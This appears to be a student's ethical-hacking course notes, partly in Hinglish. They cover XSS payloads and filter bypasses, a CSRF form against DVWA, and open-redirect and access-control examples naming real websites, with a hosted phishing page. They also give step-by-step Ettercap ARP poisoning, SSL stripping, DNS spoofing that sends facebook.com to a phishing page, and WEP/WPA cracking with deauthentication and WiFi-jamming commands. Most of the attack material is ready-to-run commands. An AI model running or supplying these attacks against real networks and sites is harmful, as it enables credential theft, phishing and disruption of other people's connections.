	<script>alert("hacked")</script>
	<>alert("hacked")</script>

Bypass
======
	<script> ---> remove

	<script type="text/javascript">alert("hacked")</script>
	<ScRiPt>alert("hacked")</script>
	<scr<script>ipt>alert("hacked")</script>
			<scr<script>ipt>
				<script>

2. Stored XSS
=============
	An attacker inputs the malicious javascript code into the entry point, and that malicious code is stored in the database. So whenever a user will go to that site of the web application, he will be a target of XSS. This malicious code will remain there in the database until and unless the database administrator does not remove it manually or resets the database.

	Where We can try for stored XSS
	===============================
		1. Comments
		2. Messages
		3. FAQ
		4. Form
		5. RSS Feedback

3. DOM Based XSS
================
	Documentary Object Model
	In this type of xss, our data is not send to the server, but it is updated dynamically.
	There are 3 entities which are vulnerable in DOM Based XSS
		1. document.url
		2. document.location
		3. document.referal

	DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.

	https://lucideustech.blogspot.com/2018/03/a-practical-guide-to-dom-based-xss.html


XSS Payloads
============
	<h1>abhijeet</h1>
	<script>alert("hacked")</script>
	<script>alert(document.cookie)</script>
	<iframe src="http://www.lucideus.com"></iframe>
	<input onfocus=javascript:alert(1) autofocus>


Cheat Sheet
===========
	https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 16
==========
CSRF --> Cross Site Request Forgery
===================================
It is a client side attack, in which an attacker crafts a malicious link and sends to the target. Using that link the attacker can make the target to do his malicious intents. In this attack, the attacker does not get any kind of data.


Step 1--> Open the CSRF Vulnerable Website
Step 2--> Select the element
Step 3--> Right Click The selected element--->Inspect Code
Step 4--> Choose the whole form
Step 5--> Right Click --> Edit as HTML
Step 6--> Copy the whole code
Step 7--> Paste in notepad --> change the Action field
Step 8--> Save as .html file and send/upload the link

Demo
====

<html>
<img src="https://i.ytimg.com/vi/i_FbQzQQQLI/maxresdefault.jpg">
<form action="http://127.0.0.1/dvwa/vulnerabilities/csrf/" method="GET">    New password:<br>
    <input autocomplete="off" name="password_new" type="password"><br>
    Confirm new password: <br>
    <input autocomplete="off" name="password_conf" type="password">
    <br>
    <input value="Change" name="Change" type="submit">
    </form>
</html>

If my website or web application is on shared hosting server, then only it is possible.
	yougetsignal.com

Missing Function Level Access Control
=====================================
Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.

If there are n number of users
user 1 --> prashant ---> prashant.php
user 2 --> rudra  -----> rudra.php
user 3 --> aranjit  ---> aranjit.php
user 4 --> brijesh ----> brijesh.php

user 5 --> attacker --> Abhijeet ----> Abhijeet.php
	Instead of Abhijeet.php, he will enter prashant.php and will get the access of Prashant's account, without any authentication.

oyorooms.com/user/asodf?id= abhijeet.php
							abhishek.php
							rahul.php
							sanjeev.php
							kartik.php
							neha.php
							admin.php

Invalidated Redirects and Forwards
==================================
Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

127.0.0.1/skdv/redirectTo=welcome.php
						  phishingpage.com

https://www.tinies.com/redirectTo.php?u=http%3A%2F%2Fwww.sapnagroup.com


https://www.tinies.com/redirectTo.php?u=http://www.lucideus.com

https://lucideustest.000webhostapp.com/form.html
Phishing Page

https://www.tinies.com/redirectTo.php?u=https://lucideustest.000webhostapp.com/form.html

Tools To Automate VAPT
======================
Netsparker

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 17
==========
Linux Basics
------------
Linux is derived from the word unix. Unix was the first OS. Unix was used by the government officials. And was not used by common man.
Unix Problems
-------------
1. Gov. Officials
2. If someone needs to operate, he/she needs to have complete knownledge of commands.

Linus Torvald
=============
	He created linux OS. Kernel ---> deploy.
	Open source. --> Any one can download, modify it and upload it. And can be used for our own purpose.

	Kernel ---> Modify ---> Publish --> Copyright
			Linux Kernel ----> Modify ----> Networking ----> Red Hat
			Linux Kernel ----> Modify ----> Application Dev. ----> Fedora

		Linux Kernel ----> GUI ---> User Friendly ----> Ubuntu ---> FoC

File Architecture
------------------
	There are pre defined folder with their pre defined functionalities.

	1. root --> /
	2. etc --> Configuration Folder
				It containes all the configuration files
					.conf
	3. bin --> binary folder
				It contains all the binary file of the linux terminal commands.
	4. Proc --> Process Folder
				It contains all the process files
					up-time
					time-stat
	5. Media --> Devices ---> storage Media
	6. VAR --> Variable Folder
				Files jinka size static nahi hota. The size of the file keeps on increasing.
					temp
					log
					mail
					server
	7. dev --> Device Folder
				---->  Devices which are currently used by the machine and the OS.
	8. Home ---> Users ---> contains all the user's data and files

	Linux always treats everything as a file.

Some Basic Commands
===================
cd---> change directory

ls---> list directory

man--> to get the manual of a command

mkdir--> to make a directory in linux

cp--> copy a file to another folder

mv---> move a file to another location

rm --> to remove a file only

rmdir---> remove directory

grep--> to check whether the work is in file or not

cat --> to read the contents of the file

locate --> to locate the specific file----> kisi bhi file ok dhundo

echo --> awaj kro... shor kro... aur btao... to print something on the terminal

date --> aaj k tareek vo bhi samay k sath.... for viewing the current date and time

cal --> ye apko pura ka pura calander khol k dedega pure month ka....

uname --> ye btata h tumko tumhare Linux system k vare m.....
uname -a --> ye dega sari information tumhare Linux System k jaise
		1. who is the user
		2. what is the version
		3. operating system konsa use kr rahe ho
		4. time
		5. date

jb sara kaam ho jaye.... to hum use krenge init 0----. for shutting down the device

Users and Group
===============
group --> ek jaise users ko ek kamre me bnd kr dena----> colleting and grouping similar users in a group

-rw-r--r-- 1 root root 1031 Nov 18 09:22 /etc/passwd

The next three characters (rw-) define the owner’s permission to the file. In this example, the file owner has read and write permissions only. The next three characters (r--) are the permissions for the members of the same group as the file owner (which in this example is read only). The last three characters (r--) show the permissions for all other users and in this example it is read only.

chmod --> kisi bhi file k execution krne ka tareeka hm change kr sakte h.... ya hum set kr sakte h k is file ko konsa user chala sakta h ya use kr sakta h
iske bhi alag alag tareeke hote h

chmod 754 filename

    4 stands for "read",
    2 stands for "write",
    1 stands for "execute", and
    0 stands for "no permission."

So 7 is the combination of permissions 4+2+1 (read, write, and execute), 5 is 4+0+1 (read, no write, and execute), and 4 is 4+0+0 (read, no write, and no execute).


su --> to change user---> agr tum koi kaam khud se nahi krna chahte.... to tum ya to apne dost ko kahoge ya apne kisi bhai ko....


sudo --> super user do ---> papa se kuch kaam krne k liye kehena... jo beta nahi kehe sakta

sudo adduser <username>

Basic Networking
================

ab sb kuch to set kr lia.... now i want to set an internet connection and see it's ip address and configuration... to me use karunga 'ifconfig'

ifconfig --> interface configuration
route -n
ping
traceroute
nslookup
netstat


crunch <min-length> <max-length>

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 18
==========
Network Security
----------------

Information Gathering ---> Network Based
----------------------------------------
	In this type of information gathering we prefer to gather the information about the network.
			Number of connected device
			IP Allocated
			MAC Address
			Host Name

1. Normal Information Gathering
2. Advance|Intelligent Information Gathering

1. Normal Information Gathering
-------------------------------
	In this type of information gathering, we just get the limited data,
			IP Address
			MAC Address
			Vendor Name
		netdiscover
			netdiscover -r 192.168.228.1/24
		arp-scan
			arp-scan --local

2. Advance|Intelligent Information Gathering
--------------------------------------------
	In this type of information gathering, we get the information in the very granular way.
		IP Addresses
		Port number
		Services
		Service Version
		OS
		OS Version
	nmap --> Network Maping and exploration tool
		nmap 192.168.228.1-255
		nmap 192.168.228.1/24
		nmap 192.168.228.1-255 -sS -sC -sV
				-sS ---> Service
				-sC ---> More Details
				-sV ---> Version

Network Attacks
---------------
	Free WiFi
		--> CCD
		--> Railway Station
		--> Star Bucks
		--> Costa Cafe
		--> Barista
		--> Subway
	Suppose, there is an intruder in the free wifi, and he is seeing all the data you are transmitting over the network.
		Username
		Passwords

Which attack he is using?
-------------------------
	MiTM --> Man In The Middle Attack
		An intruder is listening and seeing (sniffing and spoofing) the data transmitted over by the user. In other words, The attacker is standing between the two nodes of the communication, all the data is going through the attacker's device.

ARP Poisioning
==============
	ARP --> Address Resolution Protocol
	ARP Table  ---> Maps IP Address with the MAC Address
	In this attack, the attacked poisons the ARP Cache.

Ettercap ---> It is a tool which is used for performing MiTM and ARP Poisioning attack in the network. It is pre-installed in Kali Linux.

Attack
======

1. Information Gathering
	#arp-scan --local

2. Start Ettercap
	#ettercap -G
		G ---> Graphical Version
Start MiTM Attack
	1. Goto "Sniff"
	2. Click on "Unified Sniffing"
	3. Select the interface ---> eth0
	4. Goto on "Hosts"
	5. Click on "Scan For Hosts"
	6. Goto on "Hosts"
	7. Click on "Hosts List"
		192.168.228.137 ---> Target
		Router --> Default Gateway
					#route -n
					192.168.228.2
	8. Select default gateway -->  192.168.228.2 ---> Click on "Add To Target 1"
	9. Select the Target IP Address --> 192.168.228.137 Click on "Add To Target 2"
	10. Goto "MiTM"
	11. Click on "ARP Poisioning"
	12. Check on "Sniff Remote Connections" and click on "OK"
	13. Goto "Start"
	14. Click on "Start Sniffing"

Working
	http://www.vivastreet.co.in

"Secure Connection Failed"
		https://www.paytm.com
		https://www.linkedin.com
		https://www.instagram.com
		https://www.onlinesbi.com
		https://www.netflix.com

HTTP --> Hyper Text Transfer Protocol
HTTPS -> Hyper Text Transfer Protocol Secure
										|
										|--> S=Secure
												|->SSL
											Secure Socket Layer
											443

For Performing MiTM and ARP Poisioning on HTTPS websites. We need to do SSL Striping.
For Performing sslstriping, we need to perform 3 steps
	1. IP Forwarding
	2. Traffic Redirection
	3. SSL Striping

1. IP Forwarding
================
	To Step up the IP Address and listen for the traffic which is transmitted by SSL.
		#more /proc/sys/net/ipv4/ip_forward
			0
		#echo "1" > /proc/sys/net/ipv4/ip_forward
		#more /proc/sys/net/ipv4/ip_forward
			1

2. Traffic Redirection
======================
	SSL works for port 80.
	Data which is transmitted over port number 80, will be encrypted and protected by SSL. So we will redirect the data from port 80 to any random port, let's say port number 8080.
		#locate etter.conf
			/etc/ettercap/etter.conf
			/usr/share/ettercap/doc/etter.conf.5.pdf
			/usr/share/man/man5/etter.conf.5.gz
		#nano /etc/ettercap/etter.conf
			ec_uid = 0                # nobody is the default
			ec_gid = 0                # nobody is the default

			Scroll Down Until You Find Something Like This
				#---------------
				#     Linux
				#---------------
			You will find another line
			#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

			Copy that line and paste it in notepad

			#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

			we need to modify this command.

		iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 --> This is my commmand

		#iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

3. SSL Striping
===============
	Now all the thing is set up, we are good to go. Start the sslstriping tool and use it for port 8080

		#sslstrip -l 8080
			-l --> Listining

Now we will perform MiTM and ARP Poisioning

Start Ettercap
	#ettercap -G
		G ---> Graphical Version
Start MiTM Attack
	1. Goto "Sniff"
	2. Click on "Unified Sniffing"
	3. Select the interface ---> eth0
	4. Goto on "Hosts"
	5. Click on "Scan For Hosts"
	6. Goto on "Hosts"
	7. Click on "Hosts List"
		192.168.228.137 ---> Target
		Router --> Default Gateway
					#route -n
					192.168.228.2
	8. Select default gateway -->  192.168.228.2 ---> Click on "Add To Target 1"
	9. Select the Target IP Address --> 192.168.228.137 Click on "Add To Target 2"
	10. Goto "MiTM"
	11. Click on "ARP Poisioning"
	12. Check on "Sniff Remote Connections" and click on "OK"
	13. Goto "Start"
	14. Click on "Start Sniffing"

DNS Poisioning Attack | DNS Spoofing Attack
===========================================
It will let the user to redirect to phishing web page in the network
www.facebook.com ----> It will go to my IP ADdress where i have hosted another phishing page.

	#locate etter.conf
		/etc/ettercap/etter.conf
		/usr/share/ettercap/doc/etter.conf.5.pdf
		/usr/share/man/man5/etter.conf.5.gz
	#nano /etc/ettercap/etter.conf

[privs]
ec_uid = 1234234                # nobody is the default
ec_gid = 4124123                # nobody is the default

make ec_uid and ec_gid as 0
I will scroll down until I find something written as
	-----
	LINUX
	-----
# if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    # redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    Remove the hashed from both the lines

# if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#ettercap -G
	Sniff ---> Unified Sniffing ---> Network Interface --> eth0
	Hosts ---> Scan For Hosts
	Hosts --> Hosts List
	Select the target 1 as the default gateway
							route -n
							172.16.226.2
	Select the target 2 as the victim machine
							172.16.226.154
	MiTM --> ARP Poisioning --> Sniff Remote Connection Only
	Goto "Plugins" --> Manage the Plugins
	Double click "dns_spoof"
	Start ---> Start sniffing

#locate etter.dns
	/etc/ettercap/etter.dns
#nano /etc/ettercap/etter.dns
search where it is written
www.microsoft.com    A    *.*.*.*

enter below
www.facebook.com 	A  	<your IP Address>
facebook.com 	A  	<your IP Address>

save the file and exit

	#service apache2 start

/var/www/html/ ---> place your phishing page here


Xerosploit
==========
Go to google.com
	--> github xerosploit
	--> https://github.com/LionSec/xerosploit
You will see a green button, ---> Clone or Download
Copy that link
	--> https://github.com/LionSec/xerosploit.git
Open a terminal in kali linux and type
	#git clone https://github.com/LionSec/xerosploit.git
	#cd xerosploit
	#python install.py

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 19 and Session 20
=========================
Wireless Security
-----------------

Wireless Technology
-------------------
	WiFi --> Wireless Fidility
	Bluetooth
	RFID

	IEEE 802.11(a|b|n)
	------------------
		This is set of standards, which tells me the following things
			-- Number Of devices that can connect
			-- Maximun Data Transmission Speed
			-- Protocols Support
			-- Area Cover

	WiFi
	====
		1. WEP
		2. WPA|WPA2

BSSID  MAC address of the access point. In the Client section, a BSSID of "(not associated)" means that the client
              is not associated with any AP. In this unassociated state, it is searching for an AP to connect with.

       PWR    Signal  level  reported by the card. Its signification depends on the driver, but as the signal gets higher
              you get closer to the AP or the station. If the BSSID PWR is -1, then the  driver  doesn't  support  signal
              level  reporting.  If  the  PWR is -1 for a limited number of stations then this is for a packet which came
              from the AP to the client but the client transmissions are out of range for  your  card.  Meaning  you  are
              hearing only 1/2 of the communication. If all clients have PWR as -1 then the driver doesn't support signal
              level reporting.

       RXQ    Only shown when on a fixed channel. Receive Quality as measured by the percentage  of  packets  (management
              and data frames) successfully received over the last 10 seconds. It's measured over all management and data
              frames. That's the clue, this allows you to read more things out of this value. Lets say you got  100  per‐
              cent  RXQ and all 10 (or whatever the rate) beacons per second coming in. Now all of a sudden the RXQ drops
              below 90, but you still capture all sent beacons. Thus you know that the AP is sending frames to  a  client
              but  you  can't  hear the client nor the AP sending to the client (need to get closer). Another thing would
              be, that you got a 11MB card to monitor and capture frames (say a prism2.5) and you have a very good  posi‐
              tion  to  the  AP. The AP is set to 54MBit and then again the RXQ drops, so you know that there is at least
              one 54MBit client connected to the AP.

       Beacons
              Number of beacons sent by the AP. Each access point sends about ten beacons per second at the  lowest  rate
              (1M), so they can usually be picked up from very far.

       #Data  Number of captured data packets (if WEP, unique IV count), including data broadcast packets.

       #/s    Number of data packets per second measure over the last 10 seconds.

       CH     Channel  number  (taken from beacon packets). Note: sometimes packets from other channels are captured even
              if airodump-ng is not hopping, because of radio interference.

       MB     Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates  are
              802.11g. The dot (after 54 above) indicates short preamble is supported. 'e' indicates that the network has
              QoS (802.11e) enabled.

       ENC    Encryption algorithm in use. OPN = no encryption,"WEP?" = WEP or higher (not enough data to choose  between
              WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP
              or CCMP or MGT is present.

       CIPHER The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP  is  typically
              used  with  WPA and CCMP is typically used with WPA2. WEP40 is displayed when the key index is greater then
              0. The standard states that the index can be 0-3 for 40bit and should be 0 for 104 bit.

       AUTH   The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared
              key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP).

       WPS    This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the col‐
              umn indicates version supported. The second field indicates WPS  config  methods  (can  be  more  than  one
              method,  separated  by  comma):  USB  = USB method, ETHER = Ethernet, LAB = Label, DISP = Display, EXTNFC =
              External NFC, INTNFC = Internal NFC, NFCINTF = NFC Interface, PBC = Push Button, KPAD =  Keypad. Locked  is
              displayed when AP setup is locked.

       ESSID  The so-called "SSID", which can be empty if SSID hiding is activated. In this case, airodump-ng will try to
              recover the SSID from probe responses and association requests.


WEP
===
#iwconfig
#airmon-ng
#airmon-ng start wlan0
#iwconfig
#airodump-ng wlan0mon
	bssid 				channel number
#airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
	Wait until the beacons number reaches to 25,000
#aircrack-ng aranjit-01.cap

WPA|WPA2
========
When there is a new device connecting
-------------------------------------
#iwconfig
#airmon-ng
#airmon-ng start wlan0
#iwconfig
#airodump-ng wlan0mon
	bssid 				channel number
#airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
	It will help you to get the WPA handshake
#aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap


When there is no new device connecting
-------------------------------------
#iwconfig
#airmon-ng
#airmon-ng start wlan0
#iwconfig
#airodump-ng wlan0mon
	bssid 				channel number
#airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
	It will help you to get the WPA handshake
#aireplay-ng -0 10 -a <Router's BSSID> -s <Station's BSSID> wlan0mon
	This will make us capture the handshake
#aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap

WiFi Jammer
===========
#aireplay-ng -0 0 -a <Router's BSSID> -s FF:FF:FF:FF:FF:FF wlan0mon

Desktop Security
Information Gathering
Phases of Hacking
Cyber Laws
Malware Illustration
Social Engineering and Phishing Attacks
OWASP Top 10 Attacks
	SQL Injections
	XXS --> Cross Site Scripting
Network Exploitation and Security
Wireless Network Exploitation and Security
Mobile Device Exploitation

mimikatz
Vault 7: year zero
GET and POST